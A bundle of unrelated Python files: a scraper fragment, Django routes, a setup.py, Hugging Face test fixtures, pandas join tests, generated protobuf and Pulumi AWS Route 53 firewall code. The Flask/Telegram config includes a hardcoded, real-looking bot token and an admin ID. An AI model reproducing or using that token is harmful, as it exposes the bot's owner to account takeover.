elif winner_flag is False:
item['tender_name'].append({tender_name: 'par'})
break
else:
                    print('No participants table found, moving on to the next tender...')
except (NoSuchElementException, StaleElementReferenceException):
            print('{}\nError while fetching the list, retrying...'.format(80 * '='))
# del participant_dict
counter -= 1
# sleep(1)
continue
return participants_list
|
from django.urls import path
from rest_framework.routers import SimpleRouter
from .views import (
CoursesAPIView,
ReviewsAPIView,
CourseAPIView,
ReviewAPIView,
CourseViewSet,
ReviewViewSet
)
router = SimpleRouter()
router.register('courses', CourseViewSet)
router.register('reviews', ReviewViewSet)
urlpatterns = [
path('courses/', CoursesAPIView.as_view(), name='courses'),
path('courses/<int:pk>/', CourseAPIView.as_view(), name='course'),
path('courses/<int:course_pk>/reviews', ReviewsAPIView.as_view(), name='course_reviews'),
path('courses/<int:course_pk>/reviews/<int:review_pk>', ReviewAPIView.as_view(), name='course_review'),
path('reviews/', ReviewsAPIView.as_view(), name='reviews'),
path('reviews/<int:review_pk>/', ReviewAPIView.as_view(), name='review')
]
# Note: the viewset routes registered on the router above are only exposed if
# router.urls is included, e.g. urlpatterns += router.urls.
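# Sketch: resolving the named routes above with django.urls.reverse; the pk
# values are placeholders, and any prefix added by include() would be prepended.
#   reverse('course', kwargs={'pk': 1})                 # -> '/courses/1/'
#   reverse('course_reviews', kwargs={'course_pk': 1})  # -> '/courses/1/reviews'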
|
'''Installation script run by pip'''
from setuptools import setup, find_packages
setup(
name='competitive_programming_tools',
version='0.1',
packages=find_packages(),
install_requires=[
'click',
'colorama',
],
entry_points={
'console_scripts': [
'cpt = competitive_programming_tools:main',
],
},
)
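# Usage sketch (shell): installing the package exposes the `cpt` console
# script declared in entry_points above.
#   pip install -e .
#   cpt --help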
|
import time
from unittest.mock import patch
import pytest
import requests
from huggingface_hub.hf_api import HfApi
USER = "__DUMMY_TRANSFORMERS_USER__"
FULL_NAME = "Dummy User"
PASS = "__DUMMY_TRANSFORMERS_PASS__"
ENDPOINT_STAGING = "https://moon-staging.huggingface.co"
ENDPOINT_STAGING_DATASETS_URL = ENDPOINT_STAGING + "/datasets/{path}/resolve/{revision}/{name}"
@pytest.fixture(scope="session")
def hf_api():
return HfApi(endpoint=ENDPOINT_STAGING)
@pytest.fixture(scope="session")
def hf_token(hf_api: HfApi):
hf_token = hf_api.login(username=USER, password=PASS)
yield hf_token
try:
hf_api.logout(hf_token)
except requests.exceptions.HTTPError:
pass
@pytest.fixture(scope="session")
def hf_private_dataset_repo_txt_data_(hf_api: HfApi, hf_token, text_file):
repo_name = f"repo_txt_data-{int(time.time() * 10e3)}"
hf_api.create_repo(token=hf_token, name=repo_name, repo_type="dataset", private=True)
repo_id = f"{USER}/{repo_name}"
hf_api.upload_file(
token=hf_token,
path_or_fileobj=str(text_file),
path_in_repo="data.txt",
repo_id=repo_id,
repo_type="dataset",
)
yield repo_id
try:
hf_api.delete_repo(token=hf_token, name=repo_name, repo_type="dataset")
except (requests.exceptions.HTTPError, ValueError): # catch http error and token invalid error
pass
@pytest.fixture()
def hf_private_dataset_repo_txt_data(hf_private_dataset_repo_txt_data_):
with patch("datasets.config.HF_ENDPOINT", ENDPOINT_STAGING):
with patch("datasets.config.HUB_DATASETS_URL", ENDPOINT_STAGING_DATASETS_URL):
yield hf_private_dataset_repo_txt_data_
@pytest.fixture(scope="session")
def hf_private_dataset_repo_zipped_txt_data_(hf_api: HfApi, hf_token, zip_csv_path):
repo_name = f"repo_zipped_txt_data-{int(time.time() * 10e3)}"
hf_api.create_repo(token=hf_token, name=repo_name, repo_type="dataset", private=True)
repo_id = f"{USER}/{repo_name}"
hf_api.upload_file(
token=hf_token,
path_or_fileobj=str(zip_csv_path),
path_in_repo="data.zip",
repo_id=repo_id,
repo_type="dataset",
)
yield repo_id
try:
hf_api.delete_repo(token=hf_token, name=repo_name, repo_type="dataset")
except (requests.exceptions.HTTPError, ValueError): # catch http error and token invalid error
pass
@pytest.fixture()
def hf_private_dataset_repo_zipped_txt_data(hf_private_dataset_repo_zipped_txt_data_):
with patch("datasets.config.HF_ENDPOINT", ENDPOINT_STAGING):
with patch("datasets.config.HUB_DATASETS_URL", ENDPOINT_STAGING_DATASETS_URL):
yield hf_private_dataset_repo_zipped_txt_data_
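# Minimal sketch of a test that consumes the fixtures above; it assumes
# datasets.load_dataset accepts a Hub repo id together with use_auth_token,
# as in the datasets versions these staging fixtures target.
def _example_private_dataset_test(hf_private_dataset_repo_txt_data, hf_token):
    from datasets import load_dataset

    ds = load_dataset(hf_private_dataset_repo_txt_data, use_auth_token=hf_token)
    assert "train" in ds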
|
from flask import Flask
from telebot import TeleBot
from flask_sqlalchemy import SQLAlchemy
from FreeKassa import FK
class Config(object):
SQLALCHEMY_DATABASE_URI = 'sqlite:///main.db'
SQLALCHEMY_TRACK_MODIFICATIONS = False
app = Flask(__name__)
app.config.from_object(Config)
db = SQLAlchemy(app)
kassa = FK()
bot = TeleBot('982289200:AAGs-xuy7PHgsEXDQui4uFATxgOpKHtMlSw')
admins = [865473632]
WEBHOOK_URL = ''
WEBHOOK_LISTEN = ''
WEBHOOK_PORT = None  # TODO: set the webhook port
|
import numpy as np
import pytest
from pandas._libs import join as libjoin
from pandas import Categorical, DataFrame, Index, merge
import pandas._testing as tm
class TestIndexer:
@pytest.mark.parametrize(
"dtype", ["int32", "int64", "float32", "float64", "object"]
)
def test_outer_join_indexer(self, dtype):
indexer = libjoin.outer_join_indexer
left = np.arange(3, dtype=dtype)
right = np.arange(2, 5, dtype=dtype)
empty = np.array([], dtype=dtype)
result, lindexer, rindexer = indexer(left, right)
assert isinstance(result, np.ndarray)
assert isinstance(lindexer, np.ndarray)
assert isinstance(rindexer, np.ndarray)
tm.assert_numpy_array_equal(result, np.arange(5, dtype=dtype))
exp = np.array([0, 1, 2, -1, -1], dtype=np.int64)
tm.assert_numpy_array_equal(lindexer, exp)
exp = np.array([-1, -1, 0, 1, 2], dtype=np.int64)
tm.assert_numpy_array_equal(rindexer, exp)
result, lindexer, rindexer = indexer(empty, right)
tm.assert_numpy_array_equal(result, right)
exp = np.array([-1, -1, -1], dtype=np.int64)
tm.assert_numpy_array_equal(lindexer, exp)
exp = np.array([0, 1, 2], dtype=np.int64)
tm.assert_numpy_array_equal(rindexer, exp)
result, lindexer, rindexer = indexer(left, empty)
tm.assert_numpy_array_equal(result, left)
exp = np.array([0, 1, 2], dtype=np.int64)
tm.assert_numpy_array_equal(lindexer, exp)
exp = np.array([-1, -1, -1], dtype=np.int64)
tm.assert_numpy_array_equal(rindexer, exp)
def test_left_join_indexer_unique():
a = np.array([1, 2, 3, 4, 5], dtype=np.int64)
b = np.array([2, 2, 3, 4, 4], dtype=np.int64)
result = libjoin.left_join_indexer_unique(b, a)
expected = np.array([1, 1, 2, 3, 3], dtype=np.int64)
tm.assert_numpy_array_equal(result, expected)
def test_left_outer_join_bug():
    left = np.array(
        [0, 1, 0, 1, 1, 2, 3, 1, 0, 2, 1, 2, 0, 1, 1, 2, 3, 2, 3, 2,
         1, 1, 3, 0, 3, 2, 3, 0, 0, 2, 3, 2, 0, 3, 1, 3, 0, 1, 3, 0,
         0, 1, 0, 3, 1, 0, 1, 0, 1, 1, 0, 2, 2, 2, 2, 2, 0, 3, 1, 2,
         0, 0, 3, 1, 3, 2, 2, 0, 1, 3, 0, 2, 3, 2, 3, 3, 2, 3, 3, 1,
         3, 2, 0, 0, 3, 1, 1, 1, 0, 2, 3, 3, 1, 2, 0, 3, 1, 2, 0, 2],
        dtype=np.int64,
    )
right = np.array([3, 1], dtype=np.int64)
max_groups = 4
lidx, ridx = libjoin.left_outer_join(left, right, max_groups, sort=False)
exp_lidx = np.arange(len(left), dtype=np.int64)
exp_ridx = -np.ones(len(left), dtype=np.int64)
exp_ridx[left == 1] = 1
exp_ridx[left == 3] = 0
tm.assert_numpy_array_equal(lidx, exp_lidx)
tm.assert_numpy_array_equal(ridx, exp_ridx)
def test_inner_join_indexer():
a = np.array([1, 2, 3, 4, 5], dtype=np.int64)
b = np.array([0, 3, 5, 7, 9], dtype=np.int64)
index, ares, bres = libjoin.inner_join_indexer(a, b)
index_exp = np.array([3, 5], dtype=np.int64)
tm.assert_almost_equal(index, index_exp)
aexp = np.array([2, 4], dtype=np.int64)
bexp = np.array([1, 2], dtype=np.int64)
tm.assert_almost_equal(ares, aexp)
tm.assert_almost_equal(bres, bexp)
a = np.array([5], dtype=np.int64)
b = np.array([5], dtype=np.int64)
index, ares, bres = libjoin.inner_join_indexer(a, b)
tm.assert_numpy_array_equal(index, np.array([5], dtype=np.int64))
tm.assert_numpy_array_equal(ares, np.array([0], dtype=np.int64))
tm.assert_numpy_array_equal(bres, np.array([0], dtype=np.int64))
def test_outer_join_indexer():
a = np.array([1, 2, 3, 4, 5], dtype=np.int64)
b = np.array([0, 3, 5, 7, 9], dtype=np.int64)
index, ares, bres = libjoin.outer_join_indexer(a, b)
index_exp = np.array([0, 1, 2, 3, 4, 5, 7, 9], dtype=np.int64)
tm.assert_almost_equal(index, index_exp)
aexp = np.array([-1, 0, 1, 2, 3, 4, -1, -1], dtype=np.int64)
bexp = np.array([0, -1, -1, 1, -1, 2, 3, 4], dtype=np.int64)
tm.assert_almost_equal(ares, aexp)
tm.assert_almost_equal(bres, bexp)
a = np.array([5], dtype=np.int64)
b = np.array([5], dtype=np.int64)
index, ares, bres = libjoin.outer_join_indexer(a, b)
tm.assert_numpy_array_equal(index, np.array([5], dtype=np.int64))
tm.assert_numpy_array_equal(ares, np.array([0], dtype=np.int64))
tm.assert_numpy_array_equal(bres, np.array([0], dtype=np.int64))
def test_left_join_indexer():
a = np.array([1, 2, 3, 4, 5], dtype=np.int64)
b = np.array([0, 3, 5, 7, 9], dtype=np.int64)
index, ares, bres = libjoin.left_join_indexer(a, b)
tm.assert_almost_equal(index, a)
aexp = np.array([0, 1, 2, 3, 4], dtype=np.int64)
bexp = np.array([-1, -1, 1, -1, 2], dtype=np.int64)
tm.assert_almost_equal(ares, aexp)
tm.assert_almost_equal(bres, bexp)
a = np.array([5], dtype=np.int64)
b = np.array([5], dtype=np.int64)
index, ares, bres = libjoin.left_join_indexer(a, b)
tm.assert_numpy_array_equal(index, np.array([5], dtype=np.int64))
tm.assert_numpy_array_equal(ares, np.array([0], dtype=np.int64))
tm.assert_numpy_array_equal(bres, np.array([0], dtype=np.int64))
def test_left_join_indexer2():
idx = Index([1, 1, 2, 5])
idx2 = Index([1, 2, 5, 7, 9])
res, lidx, ridx = libjoin.left_join_indexer(idx2.values, idx.values)
exp_res = np.array([1, 1, 2, 5, 7, 9], dtype=np.int64)
tm.assert_almost_equal(res, exp_res)
exp_lidx = np.array([0, 0, 1, 2, 3, 4], dtype=np.int64)
tm.assert_almost_equal(lidx, exp_lidx)
exp_ridx = np.array([0, 1, 2, 3, -1, -1], dtype=np.int64)
tm.assert_almost_equal(ridx, exp_ridx)
def test_outer_join_indexer2():
idx = Index([1, 1, 2, 5])
idx2 = Index([1, 2, 5, 7, 9])
res, lidx, ridx = libjoin.outer_join_indexer(idx2.values, idx.values)
exp_res = np.array([1, 1, 2, 5, 7, 9], dtype=np.int64)
tm.assert_almost_equal(res, exp_res)
exp_lidx = np.array([0, 0, 1, 2, 3, 4], dtype=np.int64)
tm.assert_almost_equal(lidx, exp_lidx)
exp_ridx = np.array([0, 1, 2, 3, -1, -1], dtype=np.int64)
tm.assert_almost_equal(ridx, exp_ridx)
def test_inner_join_indexer2():
idx = Index([1, 1, 2, 5])
idx2 = Index([1, 2, 5, 7, 9])
res, lidx, ridx = libjoin.inner_join_indexer(idx2.values, idx.values)
exp_res = np.array([1, 1, 2, 5], dtype=np.int64)
tm.assert_almost_equal(res, exp_res)
exp_lidx = np.array([0, 0, 1, 2], dtype=np.int64)
tm.assert_almost_equal(lidx, exp_lidx)
exp_ridx = np.array([0, 1, 2, 3], dtype=np.int64)
tm.assert_almost_equal(ridx, exp_ridx)
def test_merge_join_categorical_multiindex():
# From issue 16627
a = {
"Cat1": Categorical(["a", "b", "a", "c", "a", "b"], ["a", "b", "c"]),
"Int1": [0, 1, 0, 1, 0, 0],
}
a = DataFrame(a)
b = {
"Cat": Categorical(["a", "b", "c", "a", "b", "c"], ["a", "b", "c"]),
"Int": [0, 0, 0, 1, 1, 1],
"Factor": [1.1, 1.2, 1.3, 1.4, 1.5, 1.6],
}
b = DataFrame(b).set_index(["Cat", "Int"])["Factor"]
expected = merge(
a,
b.reset_index(),
left_on=["Cat1", "Int1"],
right_on=["Cat", "Int"],
how="left",
)
result = a.join(b, on=["Cat1", "Int1"])
expected = expected.drop(["Cat", "Int"], axis=1)
tm.assert_frame_equal(expected, result)
# Same test, but with ordered categorical
a = {
"Cat1": Categorical(
["a", "b", "a", "c", "a", "b"], ["b", "a", "c"], ordered=True
),
"Int1": [0, 1, 0, 1, 0, 0],
}
a = DataFrame(a)
b = {
"Cat": Categorical(
["a", "b", "c", "a", "b", "c"], ["b", "a", "c"], ordered=True
),
"Int": [0, 0, 0, 1, 1, 1],
"Factor": [1.1, 1.2, 1.3, 1.4, 1.5, 1.6],
}
b = DataFrame(b).set_index(["Cat", "Int"])["Factor"]
expected = merge(
a,
b.reset_index(),
left_on=["Cat1", "Int1"],
right_on=["Cat", "Int"],
how="left",
)
result = a.join(b, on=["Cat1", "Int1"])
expected = expected.drop(["Cat", "Int"], axis=1)
tm.assert_frame_equal(expected, result)
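# Sketch relating an indexer result back to values: -1 positions mark entries
# missing on that side, so the take() output must be masked afterwards (the
# arrays are the same placeholders used in test_outer_join_indexer above).
def _example_indexer_take():
    a = np.array([1, 2, 3, 4, 5], dtype=np.int64)
    b = np.array([0, 3, 5, 7, 9], dtype=np.int64)
    index, ai, bi = libjoin.outer_join_indexer(a, b)
    a_vals = np.where(ai == -1, -1, a.take(ai))  # take() wraps -1, so mask it
    return index, a_vals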
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: syft_proto/generic/pointers/v1/pointer_dataset.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from syft_proto.types.syft.v1 import id_pb2 as syft__proto_dot_types_dot_syft_dot_v1_dot_id__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='syft_proto/generic/pointers/v1/pointer_dataset.proto',
package='syft_proto.generic.pointers.v1',
syntax='proto3',
serialized_options=b'\n+org.openmined.syftproto.generic.pointers.v1',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n4syft_proto/generic/pointers/v1/pointer_dataset.proto\x12\x1esyft_proto.generic.pointers.v1\x1a!syft_proto/types/syft/v1/id.proto\"\xc3\x02\n\x0ePointerDataset\x12\x39\n\tobject_id\x18\x01 \x01(\x0b\x32\x1c.syft_proto.types.syft.v1.IdR\x08objectId\x12=\n\x0blocation_id\x18\x02 \x01(\x0b\x32\x1c.syft_proto.types.syft.v1.IdR\nlocationId\x12O\n\x15object_id_at_location\x18\x03 \x01(\x0b\x32\x1c.syft_proto.types.syft.v1.IdR\x12objectIdAtLocation\x12\x12\n\x04tags\x18\x04 \x03(\tR\x04tags\x12 \n\x0b\x64\x65scription\x18\x05 \x01(\tR\x0b\x64\x65scription\x12\x30\n\x14garbage_collect_data\x18\x06 \x01(\x08R\x12garbageCollectDataB-\n+org.openmined.syftproto.generic.pointers.v1b\x06proto3'
,
dependencies=[syft__proto_dot_types_dot_syft_dot_v1_dot_id__pb2.DESCRIPTOR,])
_POINTERDATASET = _descriptor.Descriptor(
name='PointerDataset',
full_name='syft_proto.generic.pointers.v1.PointerDataset',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='object_id', full_name='syft_proto.generic.pointers.v1.PointerDataset.object_id', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, json_name='objectId', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='location_id', full_name='syft_proto.generic.pointers.v1.PointerDataset.location_id', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, json_name='locationId', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='object_id_at_location', full_name='syft_proto.generic.pointers.v1.PointerDataset.object_id_at_location', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, json_name='objectIdAtLocation', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='tags', full_name='syft_proto.generic.pointers.v1.PointerDataset.tags', index=3,
number=4, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, json_name='tags', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='description', full_name='syft_proto.generic.pointers.v1.PointerDataset.description', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, json_name='description', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='garbage_collect_data', full_name='syft_proto.generic.pointers.v1.PointerDataset.garbage_collect_data', index=5,
number=6, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, json_name='garbageCollectData', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=124,
serialized_end=447,
)
_POINTERDATASET.fields_by_name['object_id'].message_type = syft__proto_dot_types_dot_syft_dot_v1_dot_id__pb2._ID
_POINTERDATASET.fields_by_name['location_id'].message_type = syft__proto_dot_types_dot_syft_dot_v1_dot_id__pb2._ID
_POINTERDATASET.fields_by_name['object_id_at_location'].message_type = syft__proto_dot_types_dot_syft_dot_v1_dot_id__pb2._ID
DESCRIPTOR.message_types_by_name['PointerDataset'] = _POINTERDATASET
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
PointerDataset = _reflection.GeneratedProtocolMessageType('PointerDataset', (_message.Message,), {
'DESCRIPTOR' : _POINTERDATASET,
'__module__' : 'syft_proto.generic.pointers.v1.pointer_dataset_pb2'
# @@protoc_insertion_point(class_scope:syft_proto.generic.pointers.v1.PointerDataset)
})
_sym_db.RegisterMessage(PointerDataset)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
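# Minimal round-trip sketch for the generated message; only scalar and
# repeated-string fields are set, since the Id submessage schema lives in the
# imported id_pb2 module.
def _example_round_trip():
    msg = PointerDataset(tags=["demo"], description="example", garbage_collect_data=True)
    assert PointerDataset.FromString(msg.SerializeToString()) == msg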
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['ResolverFirewallRuleGroupAssociationArgs', 'ResolverFirewallRuleGroupAssociation']
@pulumi.input_type
class ResolverFirewallRuleGroupAssociationArgs:
def __init__(__self__, *,
firewall_rule_group_id: pulumi.Input[str],
priority: pulumi.Input[int],
vpc_id: pulumi.Input[str],
mutation_protection: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a ResolverFirewallRuleGroupAssociation resource.
:param pulumi.Input[str] firewall_rule_group_id: The unique identifier of the firewall rule group.
:param pulumi.Input[int] priority: The setting that determines the processing order of the rule group among the rule groups that you associate with the specified VPC. DNS Firewall filters VPC traffic starting from the rule group with the lowest numeric priority setting.
:param pulumi.Input[str] vpc_id: The unique identifier of the VPC that you want to associate with the rule group.
:param pulumi.Input[str] mutation_protection: If enabled, this setting disallows modification or removal of the association, to help prevent against accidentally altering DNS firewall protections. Valid values: `ENABLED`, `DISABLED`.
:param pulumi.Input[str] name: A name that lets you identify the rule group association, to manage and use it.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider `default_tags` configuration block.
"""
pulumi.set(__self__, "firewall_rule_group_id", firewall_rule_group_id)
pulumi.set(__self__, "priority", priority)
pulumi.set(__self__, "vpc_id", vpc_id)
if mutation_protection is not None:
pulumi.set(__self__, "mutation_protection", mutation_protection)
if name is not None:
pulumi.set(__self__, "name", name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if tags_all is not None:
pulumi.set(__self__, "tags_all", tags_all)
@property
@pulumi.getter(name="firewallRuleGroupId")
def firewall_rule_group_id(self) -> pulumi.Input[str]:
"""
The unique identifier of the firewall rule group.
"""
return pulumi.get(self, "firewall_rule_group_id")
@firewall_rule_group_id.setter
def firewall_rule_group_id(self, value: pulumi.Input[str]):
pulumi.set(self, "firewall_rule_group_id", value)
@property
@pulumi.getter
def priority(self) -> pulumi.Input[int]:
"""
The setting that determines the processing order of the rule group among the rule groups that you associate with the specified VPC. DNS Firewall filters VPC traffic starting from the rule group with the lowest numeric priority setting.
"""
return pulumi.get(self, "priority")
@priority.setter
def priority(self, value: pulumi.Input[int]):
pulumi.set(self, "priority", value)
@property
@pulumi.getter(name="vpcId")
def vpc_id(self) -> pulumi.Input[str]:
"""
The unique identifier of the VPC that you want to associate with the rule group.
"""
return pulumi.get(self, "vpc_id")
@vpc_id.setter
def vpc_id(self, value: pulumi.Input[str]):
pulumi.set(self, "vpc_id", value)
@property
@pulumi.getter(name="mutationProtection")
def mutation_protection(self) -> Optional[pulumi.Input[str]]:
"""
If enabled, this setting disallows modification or removal of the association, to help prevent against accidentally altering DNS firewall protections. Valid values: `ENABLED`, `DISABLED`.
"""
return pulumi.get(self, "mutation_protection")
@mutation_protection.setter
def mutation_protection(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "mutation_protection", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
A name that lets you identify the rule group association, to manage and use it.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
        Key-value map of resource tags. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="tagsAll")
def tags_all(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
        A map of tags assigned to the resource, including those inherited from the provider `default_tags` configuration block.
"""
return pulumi.get(self, "tags_all")
@tags_all.setter
def tags_all(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags_all", value)
@pulumi.input_type
class _ResolverFirewallRuleGroupAssociationState:
def __init__(__self__, *,
arn: Optional[pulumi.Input[str]] = None,
firewall_rule_group_id: Optional[pulumi.Input[str]] = None,
mutation_protection: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
priority: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
vpc_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering ResolverFirewallRuleGroupAssociation resources.
:param pulumi.Input[str] arn: The ARN (Amazon Resource Name) of the firewall rule group association.
:param pulumi.Input[str] firewall_rule_group_id: The unique identifier of the firewall rule group.
:param pulumi.Input[str] mutation_protection: If enabled, this setting disallows modification or removal of the association, to help prevent against accidentally altering DNS firewall protections. Valid values: `ENABLED`, `DISABLED`.
:param pulumi.Input[str] name: A name that lets you identify the rule group association, to manage and use it.
:param pulumi.Input[int] priority: The setting that determines the processing order of the rule group among the rule groups that you associate with the specified VPC. DNS Firewall filters VPC traffic starting from the rule group with the lowest numeric priority setting.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider `default_tags` configuration block.
:param pulumi.Input[str] vpc_id: The unique identifier of the VPC that you want to associate with the rule group.
"""
if arn is not None:
pulumi.set(__self__, "arn", arn)
if firewall_rule_group_id is not None:
pulumi.set(__self__, "firewall_rule_group_id", firewall_rule_group_id)
if mutation_protection is not None:
pulumi.set(__self__, "mutation_protection", mutation_protection)
if name is not None:
pulumi.set(__self__, "name", name)
if priority is not None:
pulumi.set(__self__, "priority", priority)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if tags_all is not None:
pulumi.set(__self__, "tags_all", tags_all)
if vpc_id is not None:
pulumi.set(__self__, "vpc_id", vpc_id)
@property
@pulumi.getter
def arn(self) -> Optional[pulumi.Input[str]]:
"""
The ARN (Amazon Resource Name) of the firewall rule group association.
"""
return pulumi.get(self, "arn")
@arn.setter
def arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "arn", value)
@property
@pulumi.getter(name="firewallRuleGroupId")
def firewall_rule_group_id(self) -> Optional[pulumi.Input[str]]:
"""
The unique identifier of the firewall rule group.
"""
return pulumi.get(self, "firewall_rule_group_id")
@firewall_rule_group_id.setter
def firewall_rule_group_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "firewall_rule_group_id", value)
@property
@pulumi.getter(name="mutationProtection")
def mutation_protection(self) -> Optional[pulumi.Input[str]]:
"""
If enabled, this setting disallows modification or removal of the association, to help prevent against accidentally altering DNS firewall protections. Valid values: `ENABLED`, `DISABLED`.
"""
return pulumi.get(self, "mutation_protection")
@mutation_protection.setter
def mutation_protection(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "mutation_protection", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
A name that lets you identify the rule group association, to manage and use it.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def priority(self) -> Optional[pulumi.Input[int]]:
"""
The setting that determines the processing order of the rule group among the rule groups that you associate with the specified VPC. DNS Firewall filters VPC traffic starting from the rule group with the lowest numeric priority setting.
"""
return pulumi.get(self, "priority")
@priority.setter
def priority(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "priority", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
        Key-value map of resource tags. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="tagsAll")
def tags_all(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
        A map of tags assigned to the resource, including those inherited from the provider `default_tags` configuration block.
"""
return pulumi.get(self, "tags_all")
@tags_all.setter
def tags_all(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags_all", value)
@property
@pulumi.getter(name="vpcId")
def vpc_id(self) -> Optional[pulumi.Input[str]]:
"""
The unique identifier of the VPC that you want to associate with the rule group.
"""
return pulumi.get(self, "vpc_id")
@vpc_id.setter
def vpc_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "vpc_id", value)
class ResolverFirewallRuleGroupAssociation(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
firewall_rule_group_id: Optional[pulumi.Input[str]] = None,
mutation_protection: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
priority: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
vpc_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides a Route 53 Resolver DNS Firewall rule group association resource.
## Example Usage
```python
import pulumi
import pulumi_aws as aws
example_resolver_firewall_rule_group = aws.route53.ResolverFirewallRuleGroup("exampleResolverFirewallRuleGroup")
example_resolver_firewall_rule_group_association = aws.route53.ResolverFirewallRuleGroupAssociation("exampleResolverFirewallRuleGroupAssociation",
firewall_rule_group_id=example_resolver_firewall_rule_group.id,
priority=100,
vpc_id=aws_vpc["example"]["id"])
```
## Import
Route 53 Resolver DNS Firewall rule group associations can be imported using the Route 53 Resolver DNS Firewall rule group association ID, e.g.
